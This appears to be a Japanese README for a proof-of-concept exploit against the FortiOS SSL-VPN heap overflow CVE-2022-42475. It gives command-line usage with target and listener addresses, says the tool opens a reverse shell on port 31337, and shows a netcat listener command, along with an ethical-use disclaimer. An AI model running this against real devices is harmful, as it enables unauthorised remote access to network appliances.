
FortiOS バッファオーバーフローの脆弱性
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 FortinetのSSLVPNデーモンにおけるヒープオーバーフローを悪用するPOCコード
これは簡易的なPOCであり、非常に運が良くない限り、おそらくどこでも動作しません。バージョン依存であり、システムごとに変更される可能性が高いハードコードされたオフセットがいくつか含まれています。
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
このPOCは、Pythonコマンドを使用してポート31337でリバースシェルをセットアップします。
nc -lvnp 31337
このプロジェクトは教育および倫理的なテスト目的のみで作成されています。事前の相互同意なしにターゲットを攻撃するためにこのツールを使用することは違法です。開発者は一切の責任を負わず、このツールの誤用またはそれによる損害について責任を負いません。
Alain M に感謝します - Twitter : @plopz0r